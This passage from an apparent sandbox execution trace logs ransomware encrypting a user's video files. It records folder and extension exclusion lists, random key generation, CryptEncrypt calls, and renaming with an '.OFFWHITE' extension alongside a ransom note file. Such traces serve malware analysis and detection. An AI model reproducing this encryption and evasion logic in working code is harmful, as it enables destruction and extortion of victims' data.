pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e310*=0x100) returned 1 [0140.165] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.165] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.165] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e30c*=0x100) returned 1 [0140.165] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16a1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.165] SetLastError (dwErrCode=0x0) [0140.165] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.174] GetLastError () returned 0x0 [0140.174] GetLastError () returned 0x0 [0140.174] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.174] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.175] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16c1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.175] WriteFile (in: hFile=0xb0, lpBuffer=0x5221b0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5221b0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0140.176] GetProcessHeap () returned 0x500000 [0140.176] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16a1e) returned 0x55a7b8 [0140.176] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.176] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x16a1e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x16a1e, lpOverlapped=0x0) returned 1 [0140.186] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.186] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x16a1e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x16a1e, lpOverlapped=0x0) returned 1 [0140.186] GetProcessHeap () returned 0x500000 [0140.186] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0140.186] CloseHandle (hObject=0xb0) returned 1 [0140.188] GetProcessHeap () returned 0x500000 [0140.188] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.188] GetProcessHeap () returned 0x500000 [0140.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.189] GetProcessHeap () returned 0x500000 [0140.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.189] GetProcessHeap () returned 0x500000 [0140.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.189] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv" [0140.189] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv.OFFWHITE" [0140.189] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u5ryabkyn.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\u5rYaBKyN.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u5ryabkyn.mkv.offwhite")) returned 1 [0140.190] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71b506c0, ftCreationTime.dwHighDateTime=0x1d5e19a, ftLastAccessTime.dwLowDateTime=0x2dab3380, ftLastAccessTime.dwHighDateTime=0x1d5da49, ftLastWriteTime.dwLowDateTime=0x2dab3380, ftLastWriteTime.dwHighDateTime=0x1d5da49, nFileSizeHigh=0x0, nFileSizeLow=0xf3bd, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="uT-0.flv", cAlternateFileName="")) returned 1 [0140.190] lstrcmpiW (lpString1="uT-0.flv", lpString2=".") returned 1 [0140.190] lstrcmpiW (lpString1="uT-0.flv", lpString2="..") returned 1 [0140.190] lstrcmpiW (lpString1="uT-0.flv", lpString2="...") returned 1 [0140.190] lstrcmpiW (lpString1="uT-0.flv", lpString2="windows") returned -1 [0140.191] lstrcmpiW (lpString1="uT-0.flv", lpString2="$recycle.bin") returned 1 [0140.191] lstrcmpiW (lpString1="uT-0.flv", lpString2="rsa") returned 1 [0140.191] lstrcmpiW (lpString1="uT-0.flv", lpString2="ntuser.dat") returned 1 [0140.191] lstrcmpiW (lpString1="uT-0.flv", lpString2="programdata") returned 1 [0140.191] lstrcmpiW (lpString1="uT-0.flv", lpString2="appdata") returned 1 [0140.191] lstrcmpiW (lpString1="uT-0.flv", lpString2="program files") returned 1 [0140.191] lstrcmpiW (lpString1="uT-0.flv", lpString2="program files (x86)") returned 1 [0140.191] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0140.191] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="uT-0.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv" [0140.191] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.191] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.191] PathFindExtensionW (pszPath="uT-0.flv") returned=".flv" [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0140.191] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0140.192] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0140.192] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0140.192] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0140.192] lstrcmpiW (lpString1="uT-0.flv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0140.192] GetProcessHeap () returned 0x500000 [0140.192] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5221c0 [0140.192] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ut-0.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0140.192] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=62397) returned 1 [0140.192] GetProcessHeap () returned 0x500000 [0140.192] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.192] GetProcessHeap () returned 0x500000 [0140.192] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.193] GetProcessHeap () returned 0x500000 [0140.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.193] GetProcessHeap () returned 0x500000 [0140.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.193] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.193] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.193] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e310*=0x100) returned 1 [0140.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.193] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e30c*=0x100) returned 1 [0140.194] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xf3bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.194] SetLastError (dwErrCode=0x0) [0140.194] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.197] GetLastError () returned 0x0 [0140.197] GetLastError () returned 0x0 [0140.197] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xf4bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.197] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.197] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xf5bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.198] WriteFile (in: hFile=0xb0, lpBuffer=0x5221c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5221c0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0140.198] GetProcessHeap () returned 0x500000 [0140.198] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xf3bd) returned 0x55a7b8 [0140.198] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.198] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xf3bd, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xf3bd, lpOverlapped=0x0) returned 1 [0140.205] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.205] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xf3bd, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xf3bd, lpOverlapped=0x0) returned 1 [0140.206] GetProcessHeap () returned 0x500000 [0140.206] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0140.206] CloseHandle (hObject=0xb0) returned 1 [0140.208] GetProcessHeap () returned 0x500000 [0140.208] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.208] GetProcessHeap () returned 0x500000 [0140.208] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.208] GetProcessHeap () returned 0x500000 [0140.208] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.208] GetProcessHeap () returned 0x500000 [0140.208] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.208] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv" [0140.208] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv.OFFWHITE" [0140.208] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ut-0.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uT-0.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ut-0.flv.offwhite")) returned 1 [0140.209] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69af7750, ftCreationTime.dwHighDateTime=0x1d5dc02, ftLastAccessTime.dwLowDateTime=0x76db6750, ftLastAccessTime.dwHighDateTime=0x1d5e44e, ftLastWriteTime.dwLowDateTime=0x76db6750, ftLastWriteTime.dwHighDateTime=0x1d5e44e, nFileSizeHigh=0x0, nFileSizeLow=0x160a8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="wEtttg 5z1.mp4", cAlternateFileName="WETTTG~1.MP4")) returned 1 [0140.209] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2=".") returned 1 [0140.209] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="..") returned 1 [0140.209] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="...") returned 1 [0140.209] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="windows") returned -1 [0140.209] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="$recycle.bin") returned 1 [0140.209] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="rsa") returned 1 [0140.209] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="ntuser.dat") returned 1 [0140.209] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="programdata") returned 1 [0140.210] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="appdata") returned 1 [0140.210] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="program files") returned 1 [0140.210] lstrcmpiW (lpString1="wEtttg 5z1.mp4", lpString2="program files (x86)") returned 1 [0140.210] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0140.210] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="wEtttg 5z1.mp4" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wEtttg 5z1.mp4") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wEtttg 5z1.mp4" [0140.210] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.210] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.210] PathFindExtensionW (pszPath="wEtttg 5z1.mp4") returned=".mp4" [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".log") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".cab") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".cmd") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".com") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".cpl") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".url") returned -1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".mp3") returned 1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".pif") returned -1 [0140.211] lstrcmpiW (lpString1=".mp4", lpString2=".mp4") returned 0 [0140.211] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69af7750, ftCreationTime.dwHighDateTime=0x1d5dc02, ftLastAccessTime.dwLowDateTime=0x76db6750, ftLastAccessTime.dwHighDateTime=0x1d5e44e, ftLastWriteTime.dwLowDateTime=0x76db6750, ftLastWriteTime.dwHighDateTime=0x1d5e44e, nFileSizeHigh=0x0, nFileSizeLow=0x160a8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="wEtttg 5z1.mp4", cAlternateFileName="WETTTG~1.MP4")) returned 0 [0140.211] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0140.211] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbc8a580, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc8a580, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Videos", cAlternateFileName="")) returned 0 [0140.211] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0140.212] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0xdd354335, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2=".") returned 1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="..") returned 1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="...") returned 1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="windows") returned -1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="$recycle.bin") returned 1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="rsa") returned -1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="ntuser.dat") returned -1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="programdata") returned -1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="appdata") returned -1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="program files") returned -1 [0140.212] lstrcmpiW (lpString1="All Users", lpString2="program files (x86)") returned -1 [0140.212] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Users\\" | out: lpString1="C:/Users\\") returned="C:/Users\\" [0140.212] lstrcatW (in: lpString1="C:/Users\\", lpString2="All Users" | out: lpString1="C:/Users\\All Users") returned="C:/Users\\All Users" [0140.212] lstrcatW (in: lpString1="C:/Users\\All Users", lpString2="\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0140.212] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0140.212] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\*.*") returned="C:/Users\\All Users\\*.*" [0140.212] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName=".", cAlternateFileName="")) returned 0x544690 [0140.213] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.213] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="..", cAlternateFileName="")) returned 1 [0140.213] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.213] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.213] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2=".") returned 1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="..") returned 1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="...") returned 1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="windows") returned -1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="$recycle.bin") returned 1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="rsa") returned -1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="ntuser.dat") returned -1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="programdata") returned -1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="appdata") returned -1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="program files") returned -1 [0140.213] lstrcmpiW (lpString1="Adobe", lpString2="program files (x86)") returned -1 [0140.213] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0140.213] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Adobe" | out: lpString1="C:/Users\\All Users\\Adobe") returned="C:/Users\\All Users\\Adobe" [0140.213] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Adobe\\") returned="C:/Users\\All Users\\Adobe\\" [0140.213] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Adobe\\" | out: lpString1="C:/Users\\All Users\\Adobe\\") returned="C:/Users\\All Users\\Adobe\\" [0140.214] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Adobe\\*.*") returned="C:/Users\\All Users\\Adobe\\*.*" [0140.214] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Adobe\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0140.214] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.214] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0140.214] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.214] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.214] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, 